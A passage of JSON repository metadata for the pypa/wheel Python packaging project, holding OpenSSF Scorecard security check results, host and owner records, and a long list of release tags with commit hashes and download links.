detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Code-Review","score":2,"reason":"Found 8/27 approved changesets -- score normalized to 2","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/publish.yml:48","Warn: no topLevel permission defined: .github/workflows/publish.yml:1","Warn: no topLevel permission defined: .github/workflows/test.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.txt:0","Info: FSF or OSI recognized license: MIT License: LICENSE.txt:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/publish.yml:31"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":5,"reason":"SAST tool is not run on all commits -- score normalized to 5","details":["Warn: 6 commits out of 12 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-22T20:33:25.724Z","repository_id":23174547,"created_at":"2025-08-22T20:33:25.724Z","updated_at":"2025-08-22T20:33:25.724Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":281742688,"owners_count":26553720,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-30T02:00:06.501Z","response_time":61,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"pypa","name":"Python Packaging Authority","uuid":"647025","kind":"organization","description":"","email":"info@pypa.io","website":"https://www.pypa.io","location":"United States of America","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/647025?v=4","repositories_count":58,"last_synced_at":"2025-10-30T00:34:30.821Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/pypa","funding_links":["https://github.com/sponsors/pypa"],"total_stars":88807,"followers":2132,"following":0,"created_at":"2022-11-02T16:21:37.826Z","updated_at":"2025-10-30T00:34:30.821Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa/repositories"},"tags":[{"name":"0.46.1","sha":"7a0ea7f7c3dd73747e37368bb074cd0d9fb49259","kind":"commit","published_at":"2025-04-08T20:53:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1/manifests"},{"name":"0.46.0","sha":"1da658384bbfc14c091085bb98828e68368a1ed5","kind":"commit","published_at":"2025-04-03T09:39:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0/manifests"},{"name":"0.45.1","sha":"7855525de4093257e7bfb434877265e227356566","kind":"commit","published_at":"2024-11-23T00:14:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1/manifests"},{"name":"0.45.0","sha":"d78f0e372199f8294556345d867af4d3cf118418","kind":"commit","published_at":"2024-11-08T21:40:06.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0/manifests"},{"name":"0.44.0","sha":"7bb46d7727e6e89fe56b3c78297b3af2672bbbe2","kind":"commit","published_at":"2024-08-04T14:48:22.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.44.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0/manifests"},{"name":"0.43.0","sha":"fa33dfd01fd665c1fd90097563b34bce4b5527ef","kind":"commit","published_at":"2024-03-11T19:28:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.43.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0/manifests"},{"name":"0.42.0","sha":"63a09bb3d92630c1d35f4fcc6f79250256aeeb5c","kind":"commit","published_at":"2023-11-26T14:35:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.42.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0/manifests"},{"name":"0.41.3","sha":"a899f1c69ffddf564b904a5de974457c213dc36a","kind":"commit","published_at":"2023-10-30T10:04:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3/manifests"},{"name":"0.41.2","sha":"e76040b0d970a0fe6211c31888fc929078ba02d9","kind":"commit","published_at":"2023-08-22T09:29:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2/manifests"},{"name":"0.41.1","sha":"b626a4a2ee6a887c7ad4b984fcb4d465dbfa337d","kind":"commit","published_at":"2023-08-05T13:31:27.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1/manifests"},{"name":"0.41.0","sha":"95c2d83cde174ed3c34d5a5b53dc3b3a1ace91b6","kind":"commit","published_at":"2023-07-22T10:59:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0/manifests"},{"name":"0.40.0","sha":"461f7a3a2d4824009ca4855b3300d61e6d405dc4","kind":"commit","published_at":"2023-03-14T14:38:44.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.40.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0/manifests"},{"name":"0.38.4","sha":"814c2efe8e40051039c5a6de6945e04ecdd162ee","kind":"commit","published_at":"2022-11-09T20:33:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4/manifests"},{"name":"0.38.3","sha":"daeb157c8207b1459fc7baa5f234c165a7a5faf4","kind":"commit","published_at":"2022-11-08T17:46:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3/manifests"},{"name":"0.38.2","sha":"44193907eb308930de05deed863fb4d157c5c866","kind":"commit","published_at":"2022-11-05T12:52:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2/manifests"},{"name":"0.38.1","sha":"6f1608dc1a88f00d2390b9044bd655753f39234c","kind":"commit","published_at":"2022-11-04T09:09:25.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1/manifests"},{"name":"0.38.0","sha":"fcb94cd51f7dfd40d88dff37415750d9e3638d3b","kind":"commit","published_at":"2022-10-20T21:19:31.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0/manifests"},{"name":"0.37.1","sha":"c716c87ffa528ac9a31de3ed3217058848dc2cd2","kind":"commit","published_at":"2021-12-22T12:19:07.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1/manifests"},{"name":"0.37.0","sha":"b8c4aa055cea0132776e7e53edce3538710d5b68","kind":"commit","published_at":"2021-08-09T20:44:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0/manifests"},{"name":"0.36.2","sha":"4fb47f98550f3f43fc0b8c73f518592124ae21bd","kind":"commit","published_at":"2020-12-13T18:07:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2/manifests"},{"name":"0.36.1","sha":"64550e15fdbc96d5690dc872257edc859c218068","kind":"commit","published_at":"2020-12-04T14:00:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1/manifests"},{"name":"0.36.0","sha":"39b6397ba944d82f1fe37d043382f97b78a919d6","kind":"commit","published_at":"2020-12-01T08:52:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0/manifests"},{"name":"0.35.1","sha":"bbc60829bea2eb25ccd236b9c6c16c9ee4f0d2ef","kind":"commit","published_at":"2020-08-14T19:22:54.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1/manifests"},{"name":"0.35.0","sha":"4253bbb865823101d1a1757d12239fc74f49c4e7","kind":"commit","published_at":"2020-08-13T21:08:53.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0/manifests"},{"name":"0.34.2","sha":"0036f80513457a95a309c81d8a63f113b52dbafa","kind":"commit","published_at":"2020-01-30T22:20:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2/manifests"},{"name":"0.34.1","sha":"43078c409ebe9b7d5d70c2476fcb82055e8f0b97","kind":"tag","published_at":"2020-01-27T20:20:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1/manifests"},{"name":"0.34.0","sha":"8b2312799f46359ac78f3b011dc758c45518e9e1","kind":"commit","published_at":"2020-01-27T08:21:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0/manifests"},{"name":"0.33.6","sha":"b227ddd5beaba49294017d061d501f6d433393b0","kind":"commit","published_at":"2019-08-18T09:55:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6/manifests"},{"name":"0.33.5","sha":"9ee9726620f80232ca49991dbeef83963d94482a","kind":"commit","published_at":"2019-08-17T16:13:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5/manifests"},{"name":"0.33.4","sha":"882cd05d9bf4c4fc72568d806e227b5cf14df1d7","kind":"commit","published_at":"2019-05-11T21:41:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4/manifests"},{"name":"0.33.3","sha":"7b782219d5322ee66cef293c5c5b49fbd4133a0d","kind":"commit","published_at":"2019-05-10T11:06:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3/manifests"},{"name":"0.33.2","sha":"9534258081b4abf3af817dab976bc95ecc4bfa30","kind":"commit","published_at":"2019-05-09T08:18:30.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2/manifests"},{"name":"0.33.1","sha":"c15924d80ed2235f277569d99bb9d80f59c9b19d","kind":"commit","published_at":"2019-02-19T14:03:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1/manifests"},{"name":"0.33.0","sha":"bb54233a2dc855951fa40a48d5730c67f9d570c8","kind":"commit","published_at":"2019-02-12T06:58:33.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0/manifests"},{"name":"0.32.3","sha":"11584b78a56b4eedba4eedc55c9dac8aa2dd7070","kind":"commit","published_at":"2018-11-19T00:16:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3/manifests"},{"name":"0.32.2","sha":"3d3708c659f7b9988f958539e7748a1a01ee6e77","kind":"commit","published_at":"2018-10-20T20:03:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2/manifests"},{"name":"0.32.1","sha":"e284ddf676adffa22f6d6a7b02be7328acfe23c4","kind":"commit","published_at":"2018-10-04T06:42:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1/manifests"},{"name":"0.32.0","sha":"46e55b9bc7ac63d4c3a4dee706515968d58848ac","kind":"commit","published_at":"2018-09-29T15:36:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0/manifests"},{"name":"0.31.1","sha":"3dc261abc98a5e43bc7fcf5783d080aaf8f9f0cf","kind":"commit","published_at":"2018-05-13T17:22:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1/manifests"},{"name":"0.31.0","sha":"13d6ff3e8ef509b469d6bb6dd9cd8870ac3f2a16","kind":"commit","published_at":"2018-04-01T20:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0/manifests"},{"name":"0.30.0","sha":"3c9cc212a76b334307985cebfa7ebf269a419223","kind":"commit","published_at":"2017-09-10T21:53:40.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.